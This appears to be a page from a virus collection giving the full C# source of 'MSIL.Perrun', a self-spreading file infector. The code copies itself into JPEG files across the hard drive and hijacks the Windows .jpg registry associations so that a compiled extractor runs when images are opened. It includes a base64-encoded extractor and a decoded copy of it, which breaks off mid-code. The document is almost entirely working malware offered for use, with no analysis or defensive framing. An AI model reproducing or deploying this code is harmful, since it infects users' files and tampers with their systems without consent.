return To index | download demo package!
/* MSIL.Perrun (.NET 3.0 or above)
* alcopaul
* May 28, 2011
*
*
* This program appends a zipped file of itself to jpegs found in the hard drive and modifies jpeg files and the environment
* such that it can be executed in a jpeg and spread to other jpeg files. It creates "extrk.exe" in root directory which serves as a virtual
* machine for the virus to operate. The only way that this program be executed in another clean system is viewing the affected jpeg
* in a compression file program (WinRAR). This is a possibility since the affected image includes an instruction for the potential
* execution of the program. Otherwise, the embedded file can lie dormant for years unless the user accidentally
* or purposely drags and drops a jpeg in WinRAR.
*
*
* Methods:
*
* 1.) Zips itself
* 2.) Looks for jpegs in hardrive
* 3.) Checks if jpeg is already modified
* 4.) If no, appends itself to the jpeg and modifies the jpeg to include a little watermark.
* 5.) Sets modification marker
* 6.) Otherwise, looks for unmodified jpegs
*
* Note: Infected JPEG files that can be opened by winrar must have the size of 1MB or less. 7zip can do past this limit.
*
*
*/
////// virus part ///////////
using System;
using System.IO;
using System.IO.Packaging;
using System.Reflection;
using System.Drawing;
using System.Drawing.Imaging;
using System.CodeDom;
using System.CodeDom.Compiler;
using Microsoft.CSharp;
using System.Text;
using Microsoft.Win32;
namespace ConsoleApplication4
{
class Program
{
private static int counter = 0;
private static string zipfile = "";
private static string extractor = "dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLklPOw0KdXNpbmcgU3lzdGVtLklPLlBhY2thZ2luZzsNCnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsNCg0KbmFtZXNwYWNlIENvbnNvbGVBcHBsaWNhdGlvbjE3DQp7DQogICAgY2xhc3MgUHJvZ3JhbQ0KICAgIHsNCiAgICAgICAgc3RhdGljIHZvaWQgTWFpbihzdHJpbmdbXSBhcmdzKQ0KICAgICAgICB7DQogICAgICAgICAgICBzdHJpbmcgeHBhcmFtc3ggPSAiIjsNCiAgICAgICAgICAgIGZvciAoaW50IGNpayA9IDA7IGNpayA8IGFyZ3MuTGVuZ3RoOyBjaWsrKykNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICB4cGFyYW1zeCArPSBhcmdzW2Npa10gKyAiICI7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBQcm9jZXNzU3RhcnRJbmZvIGYgPSBuZXcgUHJvY2Vzc1N0YXJ0SW5mbygiMHhXRUUiLCBAIjF4UVJSICIgKyBAeHBhcmFtc3gpOw0KICAgICAgICAgICAgUHJvY2Vzcy5TdGFydChmKTsNCiAgICAgICAgICAgIEZpbGVJbmZvIHlmaWxleCA9IG5ldyBGaWxlSW5mbyh4cGFyYW1zeCk7DQogICAgICAgICAgICBpZiAoeWZpbGV4Lkxhc3RXcml0ZVRpbWUuSG91ci5Ub1N0cmluZygpICsgeWZpbGV4Lkxhc3RXcml0ZVRpbWUuTWludXRlLlRvU3RyaW5nKCkgKyB5ZmlsZXguTGFzdFdyaXRlVGltZS5TZWNvbmQuVG9TdHJpbmcoKSA9PSAiNjY2IikNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBGaWxlU3RyZWFtIGggPSBuZXcgRmlsZVN0cmVhbShAeHBhcmFtc3gsIEZpbGVNb2RlLk9wZW4sIEZpbGVBY2Nlc3MuUmVhZCk7DQogICAgICAgICAgICAgICAgaW50IGogPSAoaW50KWguTGVuZ3RoOw0KICAgICAgICAgICAgICAgIEJpbmFyeVJlYWRlciBiID0gbmV3IEJpbmFyeVJlYWRlcihoKTsNCiAgICAgICAgICAgICAgICBpbnQgcG9zID0gaiAtIDA1ODg4Ow0KICAgICAgICAgICAgICAgIGludCByZXF1aXJlZCA9IDA1ODg4Ow0KICAgICAgICAgICAgICAgIGIuQmFzZVN0cmVhbS5TZWVrKHBvcywgU2Vla09yaWdpbi5CZWdpbik7DQogICAgICAgICAgICAgICAgYnl0ZVtdIGJ5ID0gYi5SZWFkQnl0ZXMocmVxdWlyZWQpOw0KICAgICAgICAgICAgICAgIGIuQ2xvc2UoKTsNCiAgICAgICAgICAgICAgICBoLkNsb3NlKCk7DQogICAgICAgICAgICAgICAgc3RyaW5nIGtvcCA9IFBhdGguR2V0UmFuZG9tRmlsZU5hbWUoKTsNCiAgICAgICAgICAgICAgICBzdHJpbmcgZGlyeCA9IERpcmVjdG9yeS5HZXRDdXJyZW50RGlyZWN0b3J5KCk7DQogICAgICAgICAgICAgICAgaWYgKGRpcnguRW5kc1dpdGgoIlxcIikgPT0gZmFsc2UpDQogICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICBkaXJ4ID0gZGlyeCArICJcXCI7DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIEZpbGVTdHJlYW0gbCA9IG5ldyBGaWxlU3RyZWFtKGRpcnggKyBrb3AgKyAiLnppcCIsIEZpbGVNb2RlLk9wZW5PckNyZWF0ZSwgRmlsZUFjY2Vzcy5SZWFkV3JpdGUpOw0KICAgICAgICAgICAgICAgIEJpbmFyeVdyaXRlciBrID0gbmV3IEJpbmFyeVdyaXRlcihsKTsNCiAgICAgICAgICAgICAgICBrLldyaXRlKGJ5KTsNCiAgICAgICAgICAgICAgICBrLkZsdXNoKCk7DQogICAgICAgICAgICAgICAgay5DbG9zZSgpOw0KICAgICAgICAgICAgICAgIGwuQ2xvc2UoKTsNCiAgICAgICAgICAgICAgICBQYWNrYWdlIHBrZ21haW4gPSBaaXBQYWNrYWdlLk9wZW4oZGlyeCArIGtvcCArICIuemlwIiwgRmlsZU1vZGUuT3BlbiwgRmlsZUFjY2Vzcy5SZWFkKTsNCiAgICAgICAgICAgICAgICBTdHJlYW0gZ2ggPSBwa2dtYWluLkdldFBhcnQobmV3IFVyaSgiL21hZ2ljLmV4ZSIsIFVyaUtpbmQuUmVsYXRpdmUpKS5HZXRTdHJlYW0oKTsNCiAgICAgICAgICAgICAgICBNZW1vcnlTdHJlYW0gZnNtID0gbmV3IE1lbW9yeVN0cmVhbSgpOw0KICAgICAgICAgICAgICAgIGludCBkYXRhOw0KICAgICAgICAgICAgICAgIGludCBjb3VudCA9IDA7DQogICAgICAgICAgICAgICAgd2hpbGUgKChkYXRhID0gZ2guUmVhZEJ5dGUoKSkgIT0gLTEpDQogICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICBmc20uV3JpdGVCeXRlKChieXRlKWRhdGEpOw0KICAgICAgICAgICAgICAgICAgICBjb3VudCArPSAxOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICBGaWxlU3RyZWFtIG91dFN0cmVhbSA9IEZpbGUuT3BlbldyaXRlKGRpcnggKyBrb3AgKyAiLmV4ZSIpOw0KICAgICAgICAgICAgICAgIGZzbS5Xcml0ZVRvKG91dFN0cmVhbSk7DQogICAgICAgICAgICAgICAgb3V0U3RyZWFtLkZsdXNoKCk7DQogICAgICAgICAgICAgICAgb3V0U3RyZWFtLkNsb3NlKCk7DQogICAgICAgICAgICAgICAgZnNtLkNsb3NlKCk7DQogICAgICAgICAgICAgICAgcGtnbWFpbi5DbG9zZSgpOw0KICAgICAgICAgICAgICAgIEZpbGUuRGVsZXRlKGRpcnggKyBrb3AgKyAiLnppcCIpOw0KICAgICAgICAgICAgICAgIFByb2Nlc3MuU3RhcnQoZGlyeCArIGtvcCArICIuZXhlIikuV2FpdEZvckV4aXQoKTsNCiAgICAgICAgICAgICAgICBGaWxlLkRlbGV0ZShkaXJ4ICsga29wICsgIi5leGUiKTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KICAgIH0NCn0NCg0K";
private static string database = "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";
private static byte[] picbyte = Convert.FromBase64String(database);
static void Main(string[] args)
{
Module gxc = Assembly.GetExecutingAssembly().GetModules()[0];
string self = gxc.FullyQualifiedName;
string currLoc = Path.GetDirectoryName(self);
string root = Directory.GetDirectoryRoot(currLoc);
DirectoryInfo dirs = new DirectoryInfo(@root);
zipfile = PrepareZip(root, self);
string extract = root + "extrk.exe";
byte[] zippedbyte = File.ReadAllBytes(zipfile);
RegistryKey RegKey = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpg", true);
string[] subkeys = RegKey.GetValueNames();
foreach (string skey in subkeys)
{
RegKey.DeleteValue(skey);
}
RegKey.SetValue("Application", "mspaint.exe", RegistryValueKind.String);
RegistryKey RegKey1 = Registry.ClassesRoot.OpenSubKey(@"Applications\mspaint.exe\shell\edit\command", true);
RegistryKey RegKey2 = Registry.ClassesRoot.OpenSubKey(@"Applications\shimgvw.dll\shell\open\command");
string g = RegKey2.GetValue("").ToString();
string[] jj = g.Split(new char[] { ' ' });
RegKey1.SetValue("", extract + " %1", RegistryValueKind.ExpandString);
string extrk = Encoding.UTF8.GetString(Convert.FromBase64String(extractor));
if (File.Exists(extract) == false)
{
extrk = extrk.Replace("05888", "0" + zippedbyte.Length.ToString());
extrk = extrk.Replace("0xWEE", jj[0]);
extrk = extrk.Replace("1xQRR", jj[1]);
bool y = BuildExe(extract, extrk);
}
Stream s = new MemoryStream(picbyte);
Image ghostImg = Image.FromStream(s);
AndLetsRock(dirs, ghostImg, zippedbyte);
ghostImg.Dispose();
s.Close();
File.Delete(zipfile);
}
private static string PrepareZip(string dir, string self)
{
string ranname = dir + Path.GetRandomFileName() + ".zip";
Package objZip = ZipPackage.Open(ranname, FileMode.OpenOrCreate, FileAccess.ReadWrite);
Module gxc = Assembly.GetExecutingAssembly().GetModules()[0];
string odtx = gxc.FullyQualifiedName;
Uri g = new Uri("/magic.exe", UriKind.Relative);
if (objZip.PartExists(g) == false)
{
PackagePart pkgPart = objZip.CreatePart(g, System.Net.Mime.MediaTypeNames.Application.Octet, CompressionOption.Maximum);
byte[] bg = File.ReadAllBytes(self);
pkgPart.GetStream().Write(bg, 0, bg.Length);
}
objZip.Close();
return ranname;
}
public static void WriteX(FileStream s, byte[] g, byte[] k)
{
BinaryWriter w = new BinaryWriter(s);
w.BaseStream.Seek(0, SeekOrigin.Begin);
w.Write(g);
w.Write(k);
w.Flush();
w.Close();
}
private static void jpeginfect(string fname, Image bg, byte[] zipbyte)
{
Image backImg = Image.FromFile(fname);
Graphics g = Graphics.FromImage(backImg);
MemoryStream fsm = new MemoryStream();
g.DrawImage(bg, 0, 0);
backImg.Save(fsm, ImageFormat.Jpeg);
g.Dispose();
backImg.Dispose();
FileStream outStream = File.OpenWrite(fname);
fsm.WriteTo(outStream);
outStream.Flush();
outStream.Close();
fsm.Close();
byte[] modjpg = File.ReadAllBytes(fname);
FileStream lll = new FileStream(fname, FileMode.OpenOrCreate, FileAccess.ReadWrite);
WriteX(lll, modjpg, zipbyte);
lll.Close();
File.SetLastWriteTime(fname, new DateTime(DateTime.Now.Year, DateTime.Now.Month, DateTime.Now.Day, 6, 6, 6));
}
private static void AndLetsRock(DirectoryInfo dir, Image lol, byte[] kkk)
{
FileInfo[] filesx = dir.GetFiles("*.jpg");
foreach (FileInfo filex in filesx)
{
string filenamex = filex.FullName;
try
{
if (filex.LastWriteTime.Hour.ToString() + filex.LastWriteTime.Minute.ToString() + filex.LastWriteTime.Second.ToString() == "666")
{
continue;
}
else
{
try
{
jpeginfect(filenamex, lol, kkk);
counter++;
}
catch
{
continue;
}
}
if (counter == 10)
{
return;
}
}
catch
{
continue;
}
}
DirectoryInfo[] dirs = dir.GetDirectories("*.*");
foreach (DirectoryInfo xdir in dirs)
{
try
{
if (counter == 10)
{
return;
}
AndLetsRock(xdir,lol,kkk);
}
catch
{
continue;
}
}
}
private static bool BuildExe(string zname, string codey)
{
ICodeCompiler vic = new CSharpCodeProvider().CreateCompiler();
CompilerParameters ocp = new CompilerParameters();
ocp.ReferencedAssemblies.Add("System.dll");
ocp.ReferencedAssemblies.Add(@Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)+ @"\Reference Assemblies\Microsoft\Framework\v3.0\WindowsBase.dll");
ocp.GenerateExecutable = true;
ocp.CompilerOptions = "/target:winexe";
ocp.OutputAssembly = zname;
CompilerResults zresults = vic.CompileAssemblyFromSource(ocp, codey);
foreach (CompilerError xvce in zresults.Errors)
{
Console.WriteLine(xvce.ErrorNumber + ": " + xvce.ErrorText);
}
if (zresults.Errors.Count == 0)
{
return true;
}
else
{
return false;
}
}
}
}
///////// decoded extractor variable in virus ///////////////
using System;
using System.IO;
using System.IO.Packaging;
using System.Diagnostics;
namespace ConsoleApplication17
{
class Program
{
static void Main(string[] args)
{
string xparamsx = "";
for (int cik = 0; cik < args.Length; cik++)
{
xparamsx += args[cik] + " ";
}
ProcessStartInfo f = new ProcessStartInfo("0xWEE", @"1xQRR " + @xparamsx);
Process.Start(f);
FileInfo yfilex = new FileInfo(xparamsx);
if (yfilex.LastWriteTime.Hour.ToString() + yfilex.LastWriteTime.Minute.ToString() + yfilex.LastWriteTime.Second.ToString() == "666")
{
FileStream h = new FileStream(@xparamsx, FileMode.Open, FileAccess.Read);
int j = (int)h.Length;
BinaryReader b = new BinaryReader(h);
int pos = j - 05888;
int required = 05888;
b.BaseStream.Seek(pos, SeekOrigin.Begin);
byte[] by = b.ReadBytes(required);
b.Close();
h.Close();
string kop = Path.GetRandomFileName();
string dirx = Directory.GetCurrentDirectory();
if (dirx.EndsWith("\\") == false)
{
dirx = dirx + "\\";
}
FileStream l = new FileStream(dirx + kop + ".zip", FileMode.OpenOrCreate, FileAccess.ReadWrite);
BinaryWriter k = new BinaryWriter(l);
k.Write(by);
k.Flush();
k.Close();
l.Close();
